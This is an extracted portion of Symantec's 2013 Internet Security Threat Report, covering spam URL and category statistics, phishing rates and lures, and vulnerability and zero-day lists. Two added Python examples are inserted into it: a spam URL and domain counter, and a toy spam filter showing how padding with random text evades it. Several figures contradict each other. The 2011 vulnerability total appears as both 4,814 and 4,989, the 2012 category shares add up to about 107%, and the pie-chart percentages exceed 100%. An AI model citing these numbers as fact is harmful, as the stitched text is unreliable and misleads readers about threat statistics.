(Monthly line chart, 0–100% on the vertical axis; values shown in the figure: JAN 82, FEB 77, MAR 78, APR 84, MAY 86, JUN 86, JUL 85, AUG 91, SEP 82, OCT 96, NOV 88, DEC 95 percent, with a trend line.)<br />
Top-level Domains (TLD) Identified in Spam URLs<br />
Figure c.10. Analysis of Top-level Domains Used in Spam URLs, 2012<br />
Source: Symantec<br />
(Bar chart, 0–70% on the vertical axis; values shown: COM 63%, RU 8%, BR 3%, with INFO, NET and ORG between 5% and 7% each.)<br />
In 2012, 85.3 percent of spam<br />
messages contained at least<br />
one URL hyperlink, compared<br />
with 86.2 percent in 2011, a<br />
decrease of 0.9 percentage<br />
points.
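The two measures behind Figures c.9 and c.10 (the share of spam carrying a URL, and the TLD mix of those URLs) can be reproduced from raw message bodies. The Python below is an added example, not Symantec's tooling, run over a handful of constructed spam bodies; it also separates numeric-IP hosts, which the phishing section later counts as "IP address domains", from named TLDs.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample spam bodies (not Symantec data); example.* hosts throughout.
SAMPLE_SPAM = [
    "Cheap meds at http://pharma-deals.example.com/order?id=1 today!",
    "Visit our casino: HTTP://WIN-BIG.EXAMPLE.RU/ and www.other.example.info.",
    "Replica watches, see http://192.0.2.10/shop/ (numeric host, no domain name)",
    "Hi, are you there? reply asap",
    "Two links: http://a.example.com/x, https://b.example.org:8443/y.",
    "Just a URL: http://promo.example.br",
]

# http(s):// or a bare www. host, up to the next whitespace, quote or angle bracket.
URL_RE = re.compile(r"""\b(?:https?://|www\.)[^\s<>"']+""", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
TRAILING_PUNCT = ".,;:!?)"


def extract_urls(body):
    """All URL-like tokens in a message body, minus trailing sentence punctuation."""
    return [m.group(0).rstrip(TRAILING_PUNCT) for m in URL_RE.finditer(body)]


def url_tld(url):
    """Upper-case TLD of the URL's host (as the report prints them), 'IP' for a
    numeric IPv4 host, or None if no host can be parsed."""
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url             # let urlsplit parse bare www. links
    host = urlsplit(url).hostname or ""   # hostname drops the port and lowercases
    if IPV4_RE.match(host):
        return "IP"
    if "." not in host:
        return None
    return host.rsplit(".", 1)[-1].upper()


def spam_url_stats(messages):
    """Share of messages containing at least one URL, and the TLD mix of all URLs,
    both as percentages rounded to one decimal like the report's figures."""
    with_url = 0
    tlds = Counter()
    for body in messages:
        urls = extract_urls(body)
        if urls:
            with_url += 1
        for tld in filter(None, map(url_tld, urls)):
            tlds[tld] += 1
    total_urls = sum(tlds.values())
    return {
        "pct_with_url": round(100 * with_url / len(messages), 1),
        "tld_share": {t: round(100 * n / total_urls, 1) for t, n in tlds.most_common()},
    }


if __name__ == "__main__":
    print(spam_url_stats(SAMPLE_SPAM))
```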
Spam by Category<br />
Background<br />
Spam is created in a variety of different styles and complexities.<br />
Some spam is plain text with a URL; some is cluttered with<br />
images and/or attachments. Some comes with very little in<br />
terms of text, perhaps only a URL. And, of course, spam is<br />
distributed in a variety of different languages. It is also common<br />
for spam to contain “Bayes poison” (random text added to<br />
messages that has been haphazardly scraped from websites to<br />
“pollute” the spam with words bearing no relation to the intent<br />
of the spam message itself). Bayes poison is used to thwart spam<br />
filters that typically try to deduce spam based on a database of<br />
words that are frequently repeated in spam messages.<br />
Any automated process to classify spam into categories would<br />
need to overcome this randomness issue. For example, the<br />
word “watch” may appear in the random text included in<br />
a pharmaceutical spam message, posing a challenge as to<br />
classifying the message as pharmaceutical spam or in the<br />
watches/jewelry category. Another challenge occurs when a<br />
pharmaceutical spam contains no obvious pharmaceutical-related<br />
words, but only an image and a URL.<br />
Spammers attempt to get their messages through to recipients<br />
without revealing too many clues that the message is spam.<br />
Clues found in the plain text content of the email can be<br />
examined using automated anti-spam techniques. A common<br />
way to overcome automated techniques is by using random text.<br />
An equally effective way is to include very little in the way of<br />
extra text in the spam, instead including a URL in the body of<br />
the message.<br />
Spam detection services often resist classifying spam into<br />
different categories because it is difficult to do (for the reasons<br />
above) and because the purpose of spam detection is to<br />
determine whether the message is spam and to block it, rather<br />
than to identify its subject matter. The most accurate way to<br />
overcome the ambiguity faced by using automated techniques<br />
to classify spam is to have someone classify unknown spam<br />
manually. While time-consuming, this process provides much<br />
more accurate results. An analyst can read the message,<br />
understand the context of the email, view images, follow URLs,<br />
and view websites in order to gather the bigger picture around<br />
the spam message.<br />
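To make the Bayes-poison effect concrete, here is an added Python example (not Symantec's classifier) with a toy word-frequency filter trained on a constructed corpus: padding a pharmaceutical spam with scraped-looking office text flips the naive verdict to ham, while a scorer that ignores never-seen words and counts only the most decisive tokens still flags it.

```python
import math
import re
from collections import Counter

# Constructed toy corpus (not Symantec data); just enough to show the mechanism.
SPAM_TRAIN = [
    "cheap pills online pharmacy discount viagra order now",
    "buy cheap watches replica rolex discount order online",
    "online casino bonus play now win cash",
    "discount pharmacy pills order online cheap",
]
HAM_TRAIN = [
    "meeting moved to thursday please review the agenda",
    "attached is the quarterly report for review",
    "can you send the notes from the project meeting",
    "lunch on friday the usual place",
]

_TOKEN = re.compile(r"[a-z0-9]+")


def tokens(text):
    return _TOKEN.findall(text.lower())


class WordFilter:
    """Multinomial naive Bayes over word counts with add-one smoothing: the kind
    of word-frequency filter the report says Bayes poison is meant to thwart."""

    def __init__(self, spam, ham, alpha=1.0):
        self.alpha = alpha
        self.spam_counts = Counter(t for m in spam for t in tokens(m))
        self.ham_counts = Counter(t for m in ham for t in tokens(m))
        self.vocab = set(self.spam_counts) | set(self.ham_counts)
        self.spam_total = sum(self.spam_counts.values())
        self.ham_total = sum(self.ham_counts.values())
        self.log_prior = math.log(len(spam) / len(ham))

    def token_log_odds(self, token):
        """log P(token|spam) - log P(token|ham); positive means spam-leaning."""
        v = self.alpha * len(self.vocab)
        p_spam = (self.spam_counts[token] + self.alpha) / (self.spam_total + v)
        p_ham = (self.ham_counts[token] + self.alpha) / (self.ham_total + v)
        return math.log(p_spam) - math.log(p_ham)

    def log_odds_naive(self, text):
        """Every token counts, once per occurrence: enough scraped legitimate-looking
        words drag the total below zero regardless of the spam words present."""
        return self.log_prior + sum(self.token_log_odds(t) for t in tokens(text))

    def log_odds_hardened(self, text, top_k=10):
        """Drop tokens never seen in training, dedupe, and score only the top_k
        tokens whose log-odds are furthest from zero, so weak filler cannot
        outvote a handful of strongly spam-leaning words."""
        seen = {t for t in tokens(text) if t in self.vocab}
        scores = sorted((self.token_log_odds(t) for t in seen), key=abs, reverse=True)
        return self.log_prior + sum(scores[:top_k])

    def classify(self, text, hardened=False):
        lo = self.log_odds_hardened(text) if hardened else self.log_odds_naive(text)
        return "spam" if lo > 0 else "ham"


FILTER = WordFilter(SPAM_TRAIN, HAM_TRAIN)

# Constructed messages: a pharmaceutical spam, the same spam with "Bayes poison"
# appended (text that reads as if scraped from an unrelated business page), and
# a legitimate mail to confirm the hardened scorer does not over-block.
CLEAN_SPAM = "cheap pills online pharmacy discount order now"
BAYES_POISON = ("the agenda for the thursday meeting is attached please review "
                "the quarterly report and notes from the project")
POISONED_SPAM = CLEAN_SPAM + " " + BAYES_POISON
LEGIT_MAIL = "please send the notes from the meeting"


def demo():
    """Return {name: (naive verdict, hardened verdict)} for the constructed messages."""
    return {
        name: (FILTER.classify(msg), FILTER.classify(msg, hardened=True))
        for name, msg in [("clean_spam", CLEAN_SPAM),
                          ("poisoned_spam", POISONED_SPAM),
                          ("legit_mail", LEGIT_MAIL)]
    }


if __name__ == "__main__":
    for name, (naive, hardened) in demo().items():
        print(f"{name:14s} naive={naive:5s} hardened={hardened}")
```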
Methodology<br />
Once per month, several thousand random spam samples are<br />
collected and classified by Symantec.cloud using a combination<br />
of electronic and human analysis into one of the following<br />
categories:<br />
• Casino/Gambling<br />
• Degrees/Diplomas<br />
• Diet/Weight Loss<br />
• Jobs/Money Mules<br />
• Malware<br />
• Mobile Phones<br />
• Pharmaceutical<br />
• Phishing<br />
• Scams/Fraud/419s<br />
• Sexual/Dating<br />
• Software<br />
• Unknown/Other<br />
• Unsolicited Newsletters<br />
• Watches/Jewelry
Data<br />
Figure c.11. Spam by Category, 2012<br />
Source: Symantec.cloud<br />
Category 2012 2011 Change<br />
Pharmaceutical 21.1% 39.6% -18.5%<br />
Watches/Jewelry 9.2% 18.6% -9.4%<br />
Sexual/Dating 54.6% 14.7% 39.9%<br />
Unsolicited Newsletters 7.4% 10.1% -2.7%<br />
Casino/Gambling 1.6% 7.9% -6.3%<br />
Diet/Weight Loss 1.0% 3.5% -2.5%<br />
Malware 1.9% 3.0% -1.1%<br />
Unknown/Other 2.4% 2.8% -0.4%<br />
Scams/Fraud/419s 0.4% 1.8% -1.4%<br />
Software 2.1% 0.8% 1.3%<br />
Jobs/Money Mules 4.4% 0.5% 3.9%<br />
Degrees/Diplomas 0.3% 0.4% -0.1%<br />
Mobile Phones 0.6% 0.3% 0.4%<br />
Phishing 0.4% 0.3% 0.2%<br />
Figure c.12. Spam by Category, 2012<br />
Source: Symantec.cloud<br />
(Horizontal bar chart of the categories listed in Figure c.11, 2011 versus 2012, horizontal axis 0–60%.)<br />
Commentary<br />
• Adult spam dominates this year, with more than half (54.6<br />
percent) of all spam in 2012 related to adult spam, an<br />
increase of 39.9 percentage points compared with 2011.<br />
These are often email messages inviting the recipient to<br />
connect to the scammer through instant messaging, or a<br />
URL hyperlink where they are then typically invited to a<br />
pay-per-view adult-content Web cam site. Often any IM<br />
conversation would be handled by a bot responder, or a<br />
person working in a low-pay, offshore call center.<br />
• The disruption of the Grum and Festi botnets in July and<br />
October 2012 respectively had a major impact on the<br />
decline in pharmaceutical spam.<br />
• A category with a low percentage still means millions of<br />
spam messages. Although it is difficult to be certain what<br />
the true volume of spam in circulation is at any given time,<br />
Symantec estimates that approximately 30 billion spam<br />
emails were sent globally each day in 2012. Where some of<br />
the categories listed earlier represent 0.4 percent of spam,<br />
this figure equates to more than 120 million spam emails in<br />
a single day.<br />
• Spam in the categories Watches/Jewelry, Casino/Gambling,<br />
Unsolicited Newsletters, and Scams/Fraud all decreased.
Phishing Activity Trends<br />
Background<br />
This section discusses the proportion of malicious email activity<br />
that is categorized as phishing attacks and looks more closely<br />
at emerging trends, particularly social engineering techniques<br />
and how attackers can automate the use of RSS news feeds to<br />
incorporate news and current affairs stories into their scams.<br />
Data<br />
Figure c.13. Phishing Rates, 2011–2012<br />
Source: Symantec.cloud<br />
(Monthly line chart for 2011 and 2012; vertical axis from 1 in 100 to 1 in 600 emails.)<br />
Methodology<br />
The data for this section is based on the analysis of email traffic<br />
collected from Symantec.cloud global honeypots and from the<br />
analysis of malicious and unwanted email traffic data collected<br />
from customers worldwide. The analysis of phishing trends<br />
is based on emails processed by Symantec.cloud Skeptic 4<br />
technology and analysis of phishing emails collected in spam<br />
honeypots. Symantec.cloud spam honeypots collected between<br />
2–5 million spam emails each day during 2012.<br />
Figure c.14. Phishing Category Types, Top 200 Organizations, 2012<br />
Source: Symantec.cloud<br />
(Pie chart; the two largest segments are Financial, 69%, and Information Services, 27%. Other labels shown in the figure: Computer Software 34%, Communications 22%, Telecom 20%, Retail 12%, Entertainment 10%, Other 5%, Government 0.2%.)<br />
Figure c.15. Tactics of Phishing Distribution, 2012<br />
Source: Symantec.cloud<br />
(Pie chart: Automated Toolkits 54%, Other Unique Domains 39%, Free Web-hosting Sites 4%, IP Address Domains 3%, Typosquatting 1%.)<br />
Commentary<br />
• Overall for 2012, 1 in 414.3 emails was identified and<br />
blocked as a phishing attack, compared with 1 in 298.9 in<br />
2011; a decrease of 0.09 percentage points.<br />
• 67.3 percent of phishing attacks in 2012 related to spoofed<br />
financial organizations, compared with 85.2 percent in<br />
2011.<br />
• Phishing attacks on organizations in the Information<br />
Services sector accounted for 27.2 percent of phishing<br />
attacks in 2012.<br />
• Phishing URLs spoofing banks attempt to steal a wide<br />
variety of information that can be used for identity theft<br />
and fraud. Attackers seek information such as names,<br />
government-issued identification numbers, bank account<br />
information, and credit card numbers. Cybercriminals are<br />
more focused on stealing financial information that can<br />
make them large amounts of money quickly versus goods<br />
that require a larger time investment, such as scams.<br />
• Phishing schemes continued to use major events to entice<br />
recipients:<br />
One scam featured references to increased numbers<br />
of Syrian refugees in southern Turkey as a result of the<br />
ongoing struggle in Syria, stating, “But you must assure<br />
me that you will use at least 50 percent of my wealth<br />
to help the Syrian refugees in Turkey. Turkish Disaster<br />
Management Agency (AFAD) said that the Syrian refugees<br />
in southern Turkey has risen to 101, 834. You must promise<br />
me that you will use 50 percent of my wealth to help the<br />
Syria people that are suffering in Turkey.”<br />
The Syrian conflict again featured in scams such as, “I am<br />
Sgt Douglas Miller Owen, a U.S Army being deployed from<br />
Afghanistan to Damascus, Syria on a 6 month mission<br />
before i finally return back home […] Out of the total fund<br />
my share was $12,000,000 (Twelve Million US Dollars)”<br />
The Libyan revolution and Arab Spring continued to be<br />
referenced in scams during 2012, including, “My name is<br />
Aisha daughter of Shukri Ghanem. We fled from Libya last<br />
year following the uprising against Col Muammar Gaddafi.<br />
[...] My father’s death is no longer news but my mother’s<br />
deteriorating health made me want to do this despite the<br />
fact that I barely know you.”<br />
• 53.7 percent of phishing attacks were conducted through<br />
the use of phishing toolkits.
Analysis of Phishing Activity by Geography, Industry Sector, and Company Size<br />
Background<br />
Phishing activity trends can also reveal patterns that may be<br />
associated with particular geographical locations or hotspots.<br />
The industry sector may also influence an organization’s risk<br />
factor, since certain industries may be exposed to different<br />
levels of threat because of the nature of their business.<br />
Moreover, the size of an organization can also play a part in<br />
determining its exposure to risk. SMBs may find themselves<br />
the target of a spam attack because they are perceived to be<br />
softer targets, less likely to have the same levels of in-depth<br />
defenses, while larger organizations are more likely to apply<br />
greater budgetary expenditure to their antispam<br />
and <strong>security</strong> countermeasures.<br />
Methodology<br />
Analysis of phishing activity based on geography, industry,<br />
and size is determined from the patterns of spam activity for<br />
Symantec.cloud clients for threats during 2012.<br />
Figure c.16. Proportion of Email Traffic Identified as Phishing by Industry Sector, 2012<br />
Source: Symantec.cloud<br />
(Horizontal bar chart comparing 2011 and 2012 for the sectors Gov/Public Sector, Finance, Education, Accom/Catering, Marketing/Media, Non-Profit, General Services, Unknown, Estate Agents, and Agriculture; horizontal axis from 1 in 500 to 1 in 50 emails.)<br />
Figure c.17. Proportion of Email Traffic Identified as Phishing by Organization Size, 2012<br />
Source: Symantec.cloud<br />
(Bar chart comparing 2011 and 2012 for organizations of 1–250, 251–500, 501–1,000, 1,001–1,500, 1,501–2,500, and 2,501+ employees; vertical axis from 1 in 100 to 1 in 800 emails.)<br />
Figure c.18. Proportion of Email Traffic Identified as Phishing by Geographic Location, 2012<br />
Source: Symantec.cloud<br />
(Horizontal bar chart comparing 2011 and 2012 for the Netherlands, South Africa, United Kingdom, Denmark, China, Canada, Australia, Cook Islands, Ireland, and Italy; horizontal axis from 1 in 1,200 to 1 in 200 emails.)<br />
Commentary<br />
• The phishing rate has significantly increased for six of<br />
the top 10 geographies in 2012. The highest average rate<br />
for phishing activity in 2012 was for organizations in the<br />
Netherlands, with an overall average phishing rate of 1 in<br />
123.1. In 2011, the highest rate was for South Africa,<br />
with an overall average phishing rate of 1 in 96.3.<br />
• The phishing rate has decreased across nine of the top 10<br />
industry sectors in 2012, except for Finance. Organizations<br />
in the Government and Public Sector were subjected to the<br />
highest level of phishing activity in 2012, with 1 in 95.4<br />
emails identified and blocked as phishing attacks. In 2011<br />
the sector with the highest average phishing rate was also<br />
the Government and Public Sector, with a phishing rate of 1<br />
in 49.4.<br />
• The phishing rate has decreased for all sizes of organization<br />
in 2012. 1 in 346.0 emails sent to large enterprises with<br />
more than 2,500 employees in 2012 were identified and<br />
blocked as phishing attacks, compared with 1 in 250.5 in<br />
2011.<br />
• 1 in 293.8 emails sent to businesses with up to 250<br />
employees in 2012 were identified and blocked as phishing<br />
attacks, compared with 1 in 266.1 in 2011.
Spam and Fraud Activity Endnotes<br />
01 See http://www.symantec.com/connect/blogs/419-oldest-trick-book-and-yet-another-scam.<br />
02 See http://www.symantec.com/<strong>security</strong>_response/landing/spam/.<br />
03 Simple Mail Transfer Protocol.<br />
04 See http://www.symanteccloud.com/sv/se/globalthreats/learning_center/what_is_skeptic
APPENDIX :: D<br />
VULNERABILITY TRENDS<br />
Vulnerability Trends<br />
A vulnerability is a weakness that allows an attacker to compromise the availability,<br />
confidentiality, or integrity of a computer system. Vulnerabilities may be the result of a<br />
programming error or a flaw in the design that will affect <strong>security</strong>. Vulnerabilities can affect<br />
both software and hardware. It is important to stay abreast of new vulnerabilities being<br />
identified in the threat landscape because early detection and patching will minimize the<br />
chances of being exploited.<br />
This section covers selected vulnerability trends and provides analysis and discussion of the trends indicated by the data.<br />
The following metrics are discussed:<br />
• Total Number of Vulnerabilities<br />
• Zero-day Vulnerabilities<br />
• Web Browser Vulnerabilities<br />
• Web Browser Plug-in Vulnerabilities<br />
• Web Attack Toolkits
Total Number of Vulnerabilities<br />
Background<br />
The total number of vulnerabilities for 2012 is based on research<br />
from independent <strong>security</strong> experts and vendors of affected<br />
products. The yearly total also includes zero-day vulnerabilities<br />
that attackers uncovered and were subsequently identified<br />
post-exploitation. Calculating the total number of vulnerabilities<br />
provides insight into vulnerability research being conducted in<br />
the threat landscape. There are many motivations for conducting<br />
vulnerability research, including <strong>security</strong>, academic, promotional,<br />
software quality assurance, and, of course, the malicious<br />
motivations that drive attackers. Symantec gathers information<br />
on all of these vulnerabilities as part of its DeepSight<br />
vulnerability database and alerting services. Examining these<br />
trends also provides further insight into other topics discussed in<br />
this report.<br />
Discovering vulnerabilities can be advantageous to both sides<br />
of the <strong>security</strong> equation: legitimate researchers may learn<br />
how better to defend against attacks by analyzing the work of<br />
attackers who uncover vulnerabilities; conversely, cybercriminals<br />
can capitalize on the published work of legitimate researchers<br />
to advance their attack capabilities. The vast majority of<br />
vulnerabilities that are exploited by attack toolkits are publicly<br />
known by the time they are exploited.<br />
Methodology<br />
Information about vulnerabilities is made public through<br />
a number of sources. These include mailing lists, vendor<br />
advisories, and detection in the wild. Symantec gathers<br />
this information and analyzes various characteristics of<br />
the vulnerabilities, including technical information and<br />
ratings in order to determine the severity and impact of the<br />
vulnerabilities. This information is stored in the DeepSight<br />
vulnerability database, which houses over 52,795 distinct<br />
vulnerabilities spanning a period of over 20 years. As part of<br />
the data gathering process, Symantec scores the vulnerabilities<br />
according to version 2.0 of the community-based CVSS (Common<br />
Vulnerability Scoring System). 1 Symantec adopted version 2.0 of<br />
the scoring system in 2008. The total number of vulnerabilities<br />
is determined by counting all of the vulnerabilities published<br />
during the reporting period. All vulnerabilities are included,<br />
regardless of severity or whether or not the vendor who produced<br />
the vulnerable product confirmed them.
Data<br />
Figure D.1. Total Vulnerabilities Identified, 2006–2012<br />
Source: Symantec<br />
(Bar chart, vertical axis 0–6,000; values shown: 2006 4,842; 2007 4,644; 2008 5,562; 2009 4,814; 2010 6,253; 2011 4,814; 2012 5,291.)<br />
Figure D.2. New Vulnerabilities Month by Month, 2011 and 2012<br />
Source: Symantec<br />
(Monthly line chart for 2011 and 2012, vertical axis 0–600.)<br />
Figure D.3. Most Frequently Attacked Vulnerabilities in 2012<br />
Source: Symantec<br />
(Bar chart of blocked exploit attempts in millions: BID 31874 at 62 million, followed by BID 8234, BID 10127, BID 6005, and BID 8811 at roughly 11 million each.)<br />
BID Detail<br />
BID 31874 Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability<br />
BID 8234 Microsoft Windows RPC Service Denial of Service Vulnerability<br />
BID 10127 Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability<br />
BID 6005 Microsoft Windows RPC Service Denial of Service Vulnerability<br />
BID 8811 Microsoft Windows RPCSS Multi-thread Race Condition Vulnerability<br />
Commentary<br />
• Actual number of new vulnerabilities reported is up,<br />
and the trend is still upwards: The total number of new<br />
vulnerabilities reported in 2012 stood at 5,291, which<br />
works out to approximately 101 new vulnerabilities a<br />
week. Compared with the 2011 figure of 4,989, this<br />
represents an increase of 6 percent. The overall pattern<br />
is still on an upward trajectory: the number of vulnerabilities<br />
reported in January 2013 amounts to 503, which is more than the<br />
number reported in the same month last year.<br />
• The most often exploited vulnerabilities are not the<br />
newest: From observation of in-field telemetry, we can see<br />
that the most frequently used vulnerability in attacks is<br />
not the newest. Our data show that the most commonly<br />
attacked component by a wide margin is the Microsoft<br />
Windows RPC component. The attacks against this<br />
component are mostly using the Microsoft Windows Server<br />
Service RPC Handling Remote Code Execution Vulnerability<br />
(BID 31874 2 ). This vulnerability was first reported back in<br />
October 2008 and Symantec blocked 61.9 million attempts<br />
to exploit it in 2012. This figure represents 5.7 times the<br />
volume of the second most exploited vulnerability, the<br />
Microsoft Windows RPCSS DCOM Interface Denial of<br />
Service Vulnerability (BID 8234 3 ), from July 2003.<br />
• The next two most often used vulnerabilities are the<br />
Microsoft Windows RPCSS DCOM Interface Denial of
Service Vulnerability (BID 10127 4 ), dating from April 2004,<br />
and the Microsoft Windows RPC Service Denial of Service<br />
Vulnerability (BID 6005 5 ), from October 2002.<br />
• Finally, the fifth most exploited vulnerability is the<br />
Microsoft Windows RPCSS Multi-thread Race Condition<br />
Vulnerability (BID 8811 6 ), reported in October 2003.<br />
• All of the top five vulnerabilities are several years old<br />
with patches available: So why are they used so often even<br />
several years after patches are available? There could be<br />
several reasons why this is the case:<br />
• Trading of vulnerabilities 7 either through legitimate or<br />
clandestine channels has given exploitable vulnerabilities<br />
a significant monetary value. Because of the restricted<br />
information available on some of these new vulnerabilities,<br />
criminals may not be able to take advantage of them unless<br />
they are willing to pay the often substantial asking prices.<br />
If they are unable or unwilling to pay, they may resort to<br />
existing, widely available, tried-and-tested vulnerabilities<br />
to achieve their goals, even if it may potentially be less<br />
effective.<br />
• Those willing to pay will want to ensure maximum<br />
return on their investment. This could mean they use the<br />
vulnerability discreetly and selectively rather than making a big splash<br />
and arousing the attention of <strong>security</strong> vendors and other<br />
criminal groups looking for new vulnerabilities to use.<br />
• Older vulnerabilities have a more established malware<br />
user base and so account for a greater amount of traffic.<br />
For example, widespread and well-established malware<br />
threats, such as W32.Downadup 8 and its variants, use the<br />
Microsoft Windows Server Service RPC Handling Remote<br />
Code Execution Vulnerability (BID 31874), which continues<br />
to register over 150,000 hits each day. Because these threats<br />
use vulnerabilities to spread in an automated fashion, the<br />
number of attacks they can launch would generally be far<br />
higher than for targeted attacks.<br />
• For various reasons, not all of the user population applies<br />
<strong>security</strong> patches quickly or at all. This means older<br />
vulnerabilities can often still be effective, even years after<br />
patches are available. Because of this, there will always be a<br />
window of opportunity for criminals to exploit, and they are<br />
all too aware of this.<br />
• File-based vulnerabilities: The most commonly exploited<br />
data file format is the PDF file format. One of the PDF<br />
related vulnerabilities, Adobe Acrobat, Adobe Reader, and<br />
Adobe Flash Player Remote Code Execution Vulnerability<br />
(BID 35759 9 ) registered as the fifth most often used<br />
vulnerability in 2011 with just over 1 million attacks<br />
reported. PDF files containing vulnerabilities are often<br />
associated with Advanced Persistent Threat (APT 10 ) style<br />
attacks, rather than self-replicating malware. However,<br />
in this particular case, the vulnerability in question was<br />
most often used in Web toolkit-based attacks. This attack<br />
scenario involves creating malicious websites to host<br />
exploit code. Users may then be tricked into visiting these<br />
malicious toolkit websites either by website redirection (for<br />
example, malicious IFRAMEs), SEO poisoning or by sending<br />
out spam emails, instant messages or social media updates<br />
with links to the malicious website. More information<br />
on Web browser vulnerabilities can be found later in this<br />
report.<br />
• One thing to note, websites hosting malicious toolkits often<br />
contain multiple exploits that can be tried against the<br />
visitor. In some cases, the kit will attempt to use all exploits<br />
at its disposal in a non-intelligent fashion whereas in more<br />
modern advanced kits, the website code will attempt to<br />
fingerprint the software installed on the computer before<br />
deciding which exploit(s) to send to maximize the success<br />
rate. The fact that there are so many Web-kit-based exploit<br />
attempts made using this old vulnerability may suggest that<br />
a considerable number of users have not updated their PDF<br />
readers to a non-vulnerable version.
Zero-day Vulnerabilities<br />
Background<br />
A zero-day vulnerability is one that is reported to have been<br />
exploited in the wild before the vulnerability is public knowledge<br />
and prior to a patch being publicly available. The absence<br />
of a patch for a zero-day vulnerability presents a threat to<br />
organizations and consumers alike, because in many cases<br />
these threats can evade purely signature-based detection until a<br />
patch is released. The unexpected nature of zero-day threats is a<br />
serious concern, especially because they may be used in targeted<br />
attacks and in the propagation of malicious code.<br />
Data<br />
Figure D.4. Volume of Zero-day Vulnerabilities, 2006–2012<br />
Source: Symantec<br />
(Bar chart, vertical axis 0–20; values shown: 2006 13; 2007 15; 2008 9; 2009 12; 2010 14; 2011 8; 2012 14.)<br />
Methodology<br />
Zero-day vulnerabilities are a sub-set of the total number of<br />
vulnerabilities documented over the reporting period. A zero-day<br />
vulnerability is one that appears to have been exploited in<br />
the wild prior to being publicly known. It may not have been<br />
known to the affected vendor prior to exploitation and, at the<br />
time of the exploit activity, the vendor had not released a patch.<br />
The data for this section consists of the vulnerabilities that<br />
Symantec has identified that meet the above criteria.<br />
Figure D.5. Zero-day Vulnerabilities Identified in 2012<br />
Source: Symantec<br />
CVE Detail<br />
CVE-2012-0003 Microsoft Windows Media Player “winmm.dll” MIDI File Parsing Remote Buffer Overflow Vulnerability<br />
CVE-2012-0056 Linux Kernel CVE-2012-0056 Local Privilege Escalation Vulnerability<br />
CVE-2012-0507 Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability<br />
CVE-2012-0767 Adobe Flash Player CVE-2012-0767 Cross Site Scripting Vulnerability<br />
CVE-2012-0779 Adobe Flash Player CVE-2012-0779 Object Type Confusion Remote Code Execution Vulnerability<br />
CVE-2012-1535 Adobe Flash Player CVE-2012-1535 Remote Code Execution Vulnerability<br />
CVE-2012-1856 Microsoft Windows Common Controls ActiveX Control CVE-2012-1856 Remote Code Execution Vulnerability<br />
CVE-2012-1875 Microsoft Internet Explorer CVE-2012-1875 Same ID Property Remote Code Execution Vulnerability<br />
CVE-2012-1889 Microsoft XML Core Services CVE-2012-1889 Remote Code Execution Vulnerability<br />
CVE-2012-4792 Microsoft Internet Explorer “CDwnBindInfo” Use-After-Free Remote Code Execution Vulnerability<br />
CVE-2012-4969 Microsoft Internet Explorer Image Arrays Use-After-Free Remote Code Execution Vulnerability<br />
CVE-2012-5076 Oracle Java SE CVE-2012-5076 Remote Java Runtime Environment Vulnerability<br />
CVE-MAP-NOMATCH Parallels Plesk Panel Unspecified Remote Security Vulnerability<br />
CVE-MAP-NOMATCH Microsoft Windows Digital Certificates Spoofing Vulnerability<br />
Commentary<br />
• 2012 saw an increase in the number of zero-day vulnerabilities<br />
compared with 2011, a 75 percent rise. However,<br />
the number seen in 2012 was inflated by<br />
Microsoft file-based vulnerabilities, whereas Adobe-based<br />
vulnerabilities totalled three, compared with four in 2011,<br />
when they topped the chart.<br />
• There were three zero-day browser vulnerabilities seen in<br />
2012, an increase of 2 from 2011. This corresponds with<br />
the dramatic increase in browser vulnerabilities compared<br />
to the total seen in 2011. With the trend moving into<br />
Web attacks, more and more browser vulnerabilities are<br />
leveraged by the attackers.<br />
• While the overall number of zero-day vulnerabilities is up,<br />
attacks using these vulnerabilities continue to be successful.<br />
Some of these vulnerabilities are leveraged in targeted<br />
attacks. Adobe Flash Player and Microsoft Windows ActiveX<br />
Control vulnerabilities are widely used in targeted attacks,<br />
and vulnerabilities in Microsoft technologies accounted for<br />
almost 50 percent of the zero-day vulnerabilities seen in<br />
2012.<br />
• Most of the attack scenarios are planned in such a way that<br />
an attacker crafts a malicious Web page to leverage the issue<br />
and uses email or other means to distribute the page and<br />
entices an unsuspecting user to view it. When the victim<br />
views the page, the attacker-supplied code is run.
p. 144
Symantec Corporation
Internet Security Threat Report 2013 :: Volume 18
VULNERABILITY TRENDS
Web Browser Vulnerabilities
Background
Web browsers are ever-present components of computing for both enterprise and individual users, on desktop and on mobile devices. Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware, and adware. In addition, Web browsers are exposed to a greater amount of potentially untrusted or hostile content than most other applications and are particularly targeted by multi-exploit attack kits.
Web-based attacks can originate from malicious websites as well as from legitimate websites that have been compromised to serve malicious content. Some content, such as media files or documents, is often presented in browsers via browser plug-in technologies. While browser functionality is often extended by the inclusion of various plug-ins, the addition of plug-in components also results in a wider potential attack surface for client-side attacks.
Data
Figure D.6. Browser Vulnerabilities, 2011 and 2012 (Source: Symantec). [Bar chart: number of vulnerabilities per browser, 2011 vs. 2012, for Apple Safari, Google Chrome, Microsoft Internet Explorer, Mozilla Firefox and Opera; vertical axis marked 100 to 600. Bar values are not recoverable from the extracted text.]
Methodology
Browser vulnerabilities are a sub-set of the total number of vulnerabilities cataloged by Symantec throughout the year. To determine the number of vulnerabilities affecting browsers, Symantec considers all vulnerabilities that have been publicly reported, regardless of whether they have been confirmed by the vendor. While vendors do confirm the majority of browser vulnerabilities that are published, not all vulnerabilities may have been confirmed at the time of writing. Vulnerabilities that are not confirmed by a vendor may still pose a threat to browser users and are therefore included in this study.
This metric examines the total number of vulnerabilities affecting the following Web browsers:
• Apple Safari
• Google Chrome
• Microsoft Internet Explorer
• Mozilla Firefox
• Opera
Commentary
• Vulnerability counts for all browsers increased dramatically in 2012, except for Opera and Microsoft Internet Explorer, which saw only a slight increase.
• Chrome vulnerabilities increased dramatically in 2012 (268). This could be due to the series of exploits developed to prove that Chrome is not unbreakable. After a spike in 2010 (191), the documented vulnerabilities for the Chrome browser dropped to 62 for 2011, which is a similar level to previous years. Several bug bounty programs were organized in 2012, which contributed to the exposure of a large number of Chrome vulnerabilities.
• These five browsers combined had 891 reported vulnerabilities in total in 2012, a strong increase from 351 in 2011. This increase is due to the dramatically increased vulnerability counts seen in Safari, Chrome, and Firefox.
Web Browser Plug-in Vulnerabilities
